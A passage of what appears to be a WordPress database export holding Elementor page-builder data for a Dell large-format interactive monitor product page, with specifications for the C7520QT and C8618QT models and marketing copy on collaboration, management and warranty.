id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"566ed8d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"716c03c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"571af73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"feb7900\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f41ecd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"1593399\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6add182\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ae25c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7520QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1ea23e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917ab9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C8618QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9debee7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"36275c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96cecb2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"40a96dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ed83b27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3418f13\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7520qt\\/global_spi\\/ng\\/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\\\" alt=\\\"Dell 75 4K Interactive Touch Monitor: C7520QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"60e9977\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"587b761\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c8618qt\\/global_spi\\/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"Dell-C8618QT-Monitor \\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"360bdc1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8248f1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e32e6e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"190bffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"277c65b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a6ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"59088a1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>75 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34c2543\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f5d29f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>85.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>4x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d69a802\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"82bae14\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9ab178a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7df1615\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fb249a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1702232\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"501ba37\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"47c9900\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"aa4df57\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2fc8b78\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ca71f29\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8e407f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"cc014f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ac0433b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4de9045\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"39f02db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6deb4e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f2ef27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"347f8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8765,1534,'_elementor_css','a:5:{s:4:\"time\";i:1572314847;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8772,3675,'_elementor_css','a:5:{s:4:\"time\";i:1572314878;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8775,3676,'_elementor_edit_mode','builder'),(8776,3676,'_elementor_template_type','wp-page'),(8777,3676,'_elementor_version','2.7.4'),(8778,3676,'_wp_page_template','template-fullwidth.php'),(8779,3676,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01f3af0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f845c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6933422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Captivate your audience<\\/h2><\\/div><div><ul><li><strong>Make the most of your meeting:<\\/strong>\\u00a0With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.<\\/li><\\/ul><ul><li><strong>Present crisply and clearly:<\\/strong>\\u00a0Monitor scaling technology allows you to capture your audience\\u2019s attention with exceptionally clear text and vivid visuals.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a70680\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"670e9e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_05.jpg\\\" alt=\\\"Captivate your audience\\\" width=\\\"360\\\" height=\\\"267\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4b5b73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0df3684\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb72a42\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67af6a3\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"1823f82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2c8aa0a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dell Large Format Monitors\",\"align\":\"center\",\"title_color\":\"#353535\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73d6a89\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4bd9f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2816dd3\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=Z98yJnbXWq8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"autoplay\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"746f096\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0102d24\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"249ca4a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d291a0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"6228508\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7c029ba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Flexible IT solutions<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fca6377\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"32f148a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_06.jpg\\\" alt=\\\"Flexible IT solutions\\\" width=\\\"445\\\" height=\\\"351\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0d8bc3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"be5af88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"28958ec\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b7a77eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5bc9eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e074cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_07.jpg\\\" alt=\\\"Adapts to business needs. Present and future.\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b39d618\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4f1e8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Adapts to business needs. Present and future.<\\/h2><\\/div><div><ul><li><strong>Solutions that work with you:<\\/strong>\\u00a0Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology you\\u2019re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can also\\u00a0be loaded with your preferred corporate image, so that it adheres to your security and service standards.<\\/li><\\/ul><ul><li><strong>Customized to your needs:<\\/strong>\\u00a0Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7383992\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4264633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"494b60f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9282776\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"91efb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"758e0fa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Easy to deploy. Simple to manage.<\\/h2><\\/div><div><ul><li><strong>A smooth deployment:<\\/strong>\\u00a0With a few painless steps, and a couple of extra hands, it\\u2019s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether that\\u2019s a mobile cart, stand or wall mount.<\\/li><li><strong>Manage your meeting spaces:<\\/strong>\\u00a0With RS232 and RJ45<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7ed52d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"35ef182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_08.jpg\\\" alt=\\\"Easy to deploy. Simple to manage.\\\" width=\\\"355\\\" height=\\\"263\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3643da4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"eba13d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"99eb408\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_09.jpg\\\" alt=\\\"Ultimate management\\\" width=\\\"337\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84d2d5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"857f2f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Ultimate management<\\/h2><\\/div><div><ul><li><strong>Seamless integration for easy access:<\\/strong>\\u00a0Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0without the need for a separate power cord, simplifying access to WiFi, annotation\\u00a0and\\u00a0meeting room management applications.<\\/li><li><strong>Easy to upgrade:<\\/strong>\\u00a0Thanks to\\u00a0it\'s\\u00a0modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0986c04\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea07f49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8d2e27\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"651dcf7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"e0e5fdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"e3c5aec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Solutions you can count on<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7c7592f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"8349623\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_10.jpg\\\" alt=\\\"Solutions you can count on\\\" width=\\\"412\\\" height=\\\"325\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b154bbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8c77514\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab08df2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb13a0c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"69147c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.955},\"elements\":[{\"id\":\"ff020de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_11.jpg\\\" alt=\\\"Dependable reliability\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1222e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.045},\"elements\":[{\"id\":\"1b3c901\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Dependable reliability<\\/h2><\\/div><div><strong>Peace of mind comes standard:<\\/strong>\\u00a0Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a class=\\\"technote microcontent\\\" rel=\\\"technotes:advanced-exchange-service-monitors\\\">*<\\/a>\\u00a0so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a class=\\\"technote microcontent\\\" rel=\\\"technotes:hardware-warranty-monitors\\\">*<\\/a>\\u00a0up to 5-years for additional support.<br \\/><br \\/><strong>Low maintenance. Simple manageability:\\u00a0<\\/strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your 